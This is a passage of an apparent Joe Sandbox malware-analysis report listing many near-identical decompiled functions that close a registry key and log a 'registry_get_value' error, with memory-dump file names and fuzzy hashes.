Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126DD70D
registry_get_value, xrefs: 00007FFE126DD706

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5233c264fc2f2bbf7ba5f9c52177b672e28e13a3e982c5a1ed757ebf16e6991f
Instruction ID: 1ed349cd691719057617495864a0494510755f1303c3c062ad88543e2ed58084
Opcode Fuzzy Hash: 5233c264fc2f2bbf7ba5f9c52177b672e28e13a3e982c5a1ed757ebf16e6991f
Instruction Fuzzy Hash: 97F0F663A09B4E46EA52AF02BC407B92254AF807B4F480275ED8D466F0DFADD9858300

Function 00007FFE11ECBD98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11ECBD2D

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

registry_get_value, xrefs: 00007FFE11ECBD76
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11ECBD7D

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: c00b75a7403bee72996b81dcde6a1367c4d79da2f84ef6df1ea375842985482d
Instruction ID: 3566868fdc48d8adcc1d09fac5047a690f53ba1c26659997d7dd0a1c1856e6ac
Opcode Fuzzy Hash: c00b75a7403bee72996b81dcde6a1367c4d79da2f84ef6df1ea375842985482d
Instruction Fuzzy Hash: 85F06812A08B4A81EB518B55BC403776259AF407F5F880276ED5D466E0DF2DE9859700

Function 00007FFE11ECBD1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11ECBD2D

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

registry_get_value, xrefs: 00007FFE11ECBD76
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11ECBD7D

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 9d60ba447d042ec848a1f0df881a030ea040afa3a163862d9c91c3f06c18c160
Instruction ID: a054203628caeab70b6e4fef1c5dd188a48e56c02506f9b60f7ce92c47dfc389
Opcode Fuzzy Hash: 9d60ba447d042ec848a1f0df881a030ea040afa3a163862d9c91c3f06c18c160
Instruction Fuzzy Hash: 6FF09C12A08F4A81EB518F95BC40377625DAF407F5F880176ED5D466F0DF3DE9859700

Function 00007FFE11ECBD0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11ECBD2D

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

registry_get_value, xrefs: 00007FFE11ECBD76
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11ECBD7D

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1ca47401105242848917e5a52f00ad11a24243aae0c42a765783fbadcb057b7a
Instruction ID: 1f48aea625393b9945e5dd8b35127b14aa1f9efd3c7f551bca01b5a48a50ee39
Opcode Fuzzy Hash: 1ca47401105242848917e5a52f00ad11a24243aae0c42a765783fbadcb057b7a
Instruction Fuzzy Hash: B5F06812A08A4A81EB528B55BC40377625DAF407F5F880176ED5D466E0DF2DE9859701

Function 00007FFE11ECBC87 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11ECBD2D

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

registry_get_value, xrefs: 00007FFE11ECBD76
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11ECBD7D

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 89b9038340141949f295c490203b943d68a61e77292b733f7e48406514dfa9d0
Instruction ID: c760273cca7ab89aa598f4c0d9b579a374914b6b43276af1afe65471075c6747
Opcode Fuzzy Hash: 89b9038340141949f295c490203b943d68a61e77292b733f7e48406514dfa9d0
Instruction Fuzzy Hash: A9F09C12A08E4A81EB518F55BC40377625DAF407F5F880176ED5D466F0DF3DE9859700

Function 00007FFE11ECBC7D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11ECBD2D

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

registry_get_value, xrefs: 00007FFE11ECBD76
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11ECBD7D

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b4c10f4c4197543128014ea051902a9567a4cf1b2e41f87356710183bfe74d50
Instruction ID: b73a95eabda493f0d725520e23ee85373c8bc901e0cb2f9c5c3bb14b95321eb2
Opcode Fuzzy Hash: b4c10f4c4197543128014ea051902a9567a4cf1b2e41f87356710183bfe74d50
Instruction Fuzzy Hash: 7EF09C12A08F4A85EB518F55BC40377625DAF407F5F880276ED5D466F0EF3DE9859700

Function 00007FFE0E1653AD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16545D

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E1654AD
registry_get_value, xrefs: 00007FFE0E1654A6

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: aee25f3375b6f68116ef9376df48ad51217fa5514f59397816fd319ffba5dc5c
Instruction ID: 26de1c27435dac81288e767afc3511a529543e7488f820fe7d89f54e5ba8b11e
Opcode Fuzzy Hash: aee25f3375b6f68116ef9376df48ad51217fa5514f59397816fd319ffba5dc5c
Instruction Fuzzy Hash: 76F0966260874B46E5529F00BD443B96255AF41795F480237DDED466B2EF3DD985D300

Function 00007FFE0E1653B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16545D

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E1654AD
registry_get_value, xrefs: 00007FFE0E1654A6

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: f1bc13f0dd94f3d455efcdcc6a1c46014af35c3bba47818547b55d9d4357c4a1
Instruction ID: 42d3dad4f9e61b238ff10fbd4220ab534c428ac5c6143c1474371abcb42a91db
Opcode Fuzzy Hash: f1bc13f0dd94f3d455efcdcc6a1c46014af35c3bba47818547b55d9d4357c4a1
Instruction Fuzzy Hash: 29F0966260864742E5529F00FD443B96255BF41795F480237DDED466F1EF3DD989D300

Function 00007FFE0E16543E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16545D

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E1654AD
registry_get_value, xrefs: 00007FFE0E1654A6

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: dbc838a92b120a7fbc130a1674ce038df8ae085bd3338e4f58499ae9dc4043a9
Instruction ID: 4a0a7da5937e2f93b55463121cd7af174e4f4a253743c22ff7f3c9baf0d35fee
Opcode Fuzzy Hash: dbc838a92b120a7fbc130a1674ce038df8ae085bd3338e4f58499ae9dc4043a9
Instruction Fuzzy Hash: 49F0966260874742E5529F00BD443B96255AF41795F480237DDED466B1EF3DDA85D300

Function 00007FFE0E16544C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16545D

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E1654AD
registry_get_value, xrefs: 00007FFE0E1654A6

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1bddf8a2747a8549afddeb8387b95dfedd9771ec2c3498b4b34397f4dff72e22
Instruction ID: 408aeb7d213b163e4cb84a62883d2819185f1852732dea68d1db39c3d29a8406
Opcode Fuzzy Hash: 1bddf8a2747a8549afddeb8387b95dfedd9771ec2c3498b4b34397f4dff72e22
Instruction Fuzzy Hash: 46F0966260874742E5529F00BD443B96255AF41795F480237DDED466B1EF3DD985D300

Function 00007FFE0E1654C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16545D

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E1654AD
registry_get_value, xrefs: 00007FFE0E1654A6

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 229bec4a5c36911d630b63b3a256d301e75d10de5bf91afb2414b1ad6b8ef515
Instruction ID: 7e9de4bc390be6521a3ee8cc4e65be97863d758d796b0fca389257ed03b5f372
Opcode Fuzzy Hash: 229bec4a5c36911d630b63b3a256d301e75d10de5bf91afb2414b1ad6b8ef515
Instruction Fuzzy Hash: D0F09062A0874742E6529F00FD443B96256BF40BA5F48423BEDED466B2EF3DDA89D300

Function 00007FFE0EB436B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4364D

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

registry_get_value, xrefs: 00007FFE0EB43696
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4369D

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 032a5fa2ff3fe31508c4440d17476d3f9ed44ed97f6dab76dafaf9c9755de483
Instruction ID: 084641b981bcc7d3ccb1af4d88c3d30f6a05845bfa56e370d77a4edcc78e63ee
Opcode Fuzzy Hash: 032a5fa2ff3fe31508c4440d17476d3f9ed44ed97f6dab76dafaf9c9755de483
Instruction Fuzzy Hash: 90F09663A0874641E6739F10B84037A6694FF447A4F4C0235DDDD466A0DF3DE9899B00

Function 00007FFE0EB4362E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4364D

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

registry_get_value, xrefs: 00007FFE0EB43696
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4369D

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0a1bd016baf32442bcb2f95c380f34f9322c41281c41bd163271b8a54a4b3606
Instruction ID: f10de0165794d30d77b16f09282070b9009efc4236f5a31fbcd56c1893257981
Opcode Fuzzy Hash: 0a1bd016baf32442bcb2f95c380f34f9322c41281c41bd163271b8a54a4b3606
Instruction Fuzzy Hash: 0AF09667A0874641E6739F00B84037A6694FF447A4F480136DD9D466A0DF3DEA899B01

Function 00007FFE0EB4363C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4364D

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

registry_get_value, xrefs: 00007FFE0EB43696
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4369D

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 4df1374e8eaa2681382dc23643ce7f70a1c10ded32d58ec47fdf7223bde413ea
Instruction ID: 8d285780d190c5e4fe4908c7d0bef39fb95b3fb6cee448ade5df1add22a8843f
Opcode Fuzzy Hash: 4df1374e8eaa2681382dc23643ce7f70a1c10ded32d58ec47fdf7223bde413ea
Instruction Fuzzy Hash: 2DF09663A0874642E6739F40B84037AA694FF447A4F480136DD9D466A0DF3DE9899B00

Function 00007FFE0EB4359D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4364D

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

registry_get_value, xrefs: 00007FFE0EB43696
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4369D

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 87cf7a335692aa203f506c9786dcd5f5ca642c99ef475ddadb6e9fe820395f6b
Instruction ID: 22e963e37c61893ff76171bf2acca933992e14d2a77228523ddd81bc1e3e691a
Opcode Fuzzy Hash: 87cf7a335692aa203f506c9786dcd5f5ca642c99ef475ddadb6e9fe820395f6b
Instruction Fuzzy Hash: 26F09663B0874A41E6739F00B84037A6694FF447A5F480235DD9D466A0EF3DE9899B00

Function 00007FFE0EB435A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

